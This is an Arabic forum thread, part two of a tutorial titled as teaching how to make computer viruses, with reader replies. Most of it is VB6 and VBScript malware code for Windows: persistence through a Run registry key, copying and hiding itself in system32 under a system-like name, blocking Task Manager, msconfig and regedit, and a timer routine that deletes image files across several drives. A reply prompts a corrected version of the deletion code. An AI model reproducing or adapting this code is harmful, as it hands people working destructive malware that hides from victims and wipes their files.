الجزأ الثاني من صناعة الفايروسات مع عالم الولة (هذا الدرس مهم جدا)

[QJgJI-pJLc]

الجزأ الثاني من صناعة الفايروسات مع عالم الولة (هذا الدرس مهم جدا)

السلام عليكم ورحمة الله وبركاته

وتحيه طيبه معطره بالطيب والغلا الي احلا منتدى عبقري معلوماتي

يجب عليك اولا الاطلاع على الجزء الاول من صناعة الفايروسات حتى تقهم الحمايه له وبعض الطرق
http://www.3asfh.net/vb/showthread.php?t=32855

-------------------------------------------------------------------------
صناعة الفايروسات تحتاج الي ذكاء والي تفكير والي احتمالات

ذكاء يعني ذكاء الفايروس كيف يعمل ماذا يفعل كيف يحمي نفسه كيف يراوغ

تفكير اي فكر كيف تصنع فايروس قوي وذكي يصعب السيطره عليه

احتمالات تعني احتمال الضحيه يعمل فرومات يعني الفايروس رايح ينحذف طيب وين اخليه يتخبأ مثل ينسخ نفسه في الدي

اووووووووووه طيب افرض الضحيه فرمت حتى الدي ايييييييييييييييييييييييه لقيت فكره رائعه اخليه بنسخ نفسه في الفلاش مموري و القرص المرن وهكذا

طيب الفلاش مموري حرف القرص يتغير من جهاز الي جهاز ربما يكون g ربما يكون e ربما يكون حرف اخر

ماشي اعمل شفرة نسخ الي اكثر من حرف واحطه باداة تايمر مع وضع شفرة تخطى الاخطاء وهكذا
================================================== =======

الفكره هو ان يقوم الفايروس بنقل نفسه الي مجلد مهم في الجهاز ثم يغير اسمه الي اسم مهم مثل windows او system

او taskmagr وهكذا حاول ان تخلي اسمه يحسس الضحيه بانه تابع لنظام

وبعد ما يتمركز الفايروس في مجلد مهم يقوم بالخطوه الثاني وهي نسخ نفسه الي عدة مجلدات والي عدة محركات اقراص

مثل الدي والفلاش مموري والقرص المرن

================================================== =======

حماية الفايروس شي مهم جدا جدا حتى لايحذف

حماية الفايروس يجب ان نحميه مثل ماذكرت سابق من ثلاث برامج وهي ( قائمة المهام + الريجتسري + بدأ الشتغيل)

================================================== ========

دعونا الان نبدا بصناعة فايروس قوى جدا ومتعدد المهام

اولا يجب ان نضع هذه الشفرات في اجراء الفورم وهذا شي اساس لكل فايروس تصنعه لابد ان تضع هذه الشفرات في كل

مره تصنع فيها فايروس

كود:

Private Sub Form_Load()
Set O = CreateObject("WScript.Shell")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr  entVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"
Form1.Hide
Name App.Path & "\" & App.EXEName & ".exe" As "c:\WINDOWS\system32\system.exe"
SetAttr "c:\WINDOWS\system32\system.exe", vbHidden
Open "C:\WINDOWS\system32\taskmgr.exe" For Input Lock Read As 1
Open "C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe" For Input Lock Read As 1
Open "C:\WINDOWS\regedit.exe" For Input Lock Read As 1
End Sub

هذه الشفرات يجب ان تضعها في كل مره تصنع فيها فايروس وتحطها في اجراء الفورم

اول شفره تشغيل الفايروس مع تشغيل الجهاز

ثاني شفره قمنا باخفاء الفايروس اي النافذه

ثالث شفره قمنا بنقل الفايروس الي مجلد system32 وتغيير اسمه الي system ويعني الفايروس تمركز في هذا المجلد

رابع شفره تم اخفاء الفايروس اي اعطاءه خاصية التخفي

الشفره الخامسه والسادسه والسابعه حمينا الفايروس من برنامج قائمة المهام و بدا الشتغيل و الريجتسري

================================================== =======

هناك شفره تقوم بتعطيل قائمة المهام نهائيا وهي تتعامل مع الريجتسري اي تغير قيمة قائمة المهام الي 1 مما يجعلها تتعطل

كود:

Const HKCU = &H80000001
Set objReg = GetObject("winmgmts:\\.\root\" & _
"Default:StdRegProv")
 strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Policies\System\"
objReg.Createkey HKCU, "Software\Microsoft\Windows\CurrentVersion\Policies\System"
objReg.SetDwordValue HKCU, strKeyPath, "DisableTaskMgr", 1

هذه الشفره تقوم بتعطيل قائمة المهام لاحظ رقم واحد في اخر الشفره معناه تعطيل قائمة المهام وعندما تضغط على

ctrl+alt+del تظهر لك رساله من النظام تقول ان قائمة المهام معطله من قبل المسؤول

ولكن عندما تشيل رقم واحد وتحط صفر سوف تعمل قائمة المهام من جديد

هذه الشفره فقط تصلح لنظام اكس بي فقط
================================================== ===

الان دعونا نصنع اوامر الفايروس

اول امر للفايروس هو حذف الصور اللي بامتداد gif في جميع اركان الجهاز

ضع اداة تايمر وجعل العداد فيها يساوي 1000

ولا تنسى وضع textbox على الفروم ايضا

واكتب هذا الكود في اجراء التايمر

كود:

Private Sub Timer1_Timer()
If Minute(Time) = 1 Then
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("d:\*.gif") <> "" Then
Kill "d:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("d:\*.jpg") <> "" Then
Kill "d:\*jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("c:\*.jpg") <> "" Then
Kill "c:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("c:\*.gif") <> "" Then
Kill "c:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("a:\*.gif") <> "" Then
Kill "a:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("a:\*.jpg") <> "" Then
Kill "a:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("e:\*.gif") <> "" Then
Kill "e:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("e:\*.jpg") <> "" Then
Kill "e:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("g:\*.gif") <> "" Then
Kill "g:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("g:\*.jpg") <> "" Then
Kill "g:\*.jpg"
Else
End
End If
End Sub
End Sub

================================================== =======

دعونا نشرح الشفرات الطويله هذه رغم انها متشابهه لكن الاختلاف بمكان الحذف


If Minute(Time) = 1 Then
Text1.Text = "QJgJI-pJLc "

عندما تكون الساعه 1:1 و 2:1 و 3:1 و4:1 الي اخره قم بتنفيذ الشرط

Text1.Text = "QJgJI-pJLc " هذا شرط انا وضعته لسد الفراغ فقط يعني حيله برمجيه لان ملقيت شرط احطه

فاوضعت اكتب عالم الوله في التيسكت بوكس

حتى يقوم باكمال بقية الشروط اذا وضع عالم الوله في textbox يقوم باكمال بقية الشروط

======================================
ElseIf Dir("d:\*.gif") <> "" Then ابحث في الدي عن صور بامتداد gif اذا وجدها سوف ينفذ الشرط
Kill "d:\*.gif" قم بحذف الصور بامتداد if
Else حقق الشرط الثاني اذا لم يتحقق الشرط الاول وهو قم بوضع عالم الوله في التيكست بوكس
Text1.Text = "QJgJI-pJLc "

وبعدها يكمل بقية الشروط بدون اي اخطاء
==================================

لاحظ في اخر شرط حطيت الشرط الثاني end اي سوف يتم ايقاف الفايروس

ولن يعمل الا في المره القادمه عند تشغيل الجهاز

يتبع في الدرس القادم ربما لن اكمله الا بعد اسبوع او اكثر نظرا لاني اعمل مدرس في مدينة بعيده عن مدينتي

اخوكم عالم الولة

[RAAD]

ما شاء الله

إبــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــــــــــــداع

درس حلو وشرح أحلى

[RBG-7]

مشكور اخوي بس هوني تسمح الصور المباشرة الموجودة في الاقراص اي ليس داخل الملفات و همنا في فيروسك تمسح كل الصور و مو بس الجنسية و همنا الي موجودي في الاقراص مباشرة و انت لازم اتحط جملة الخطا ما دام كتستخدمن kill لانه اذ ما وجد ملف تتوقع انه راح يعتمد على if ؟
تحاتي

[QJgJI-pJLc]

كود:

Private Sub Timer1_Timer()
On Error GoTo Cont:
If Minute(Time) = 1 Then
Kill "d:\*.gif"

Kill "d:\*jpg"
 Kill "c:\*.gif"
 Kill "c:\*.jpg"

Kill "e:\*.gif"
 
Kill "e:\*.jpg"

Kill "g:\*.gif"
 
Kill "g:\*.jpg"
End If
Cont:
End Sub

جرب هذا الكود افضل الاول فعلا فيه اخطاء ويحتاج الي تعديل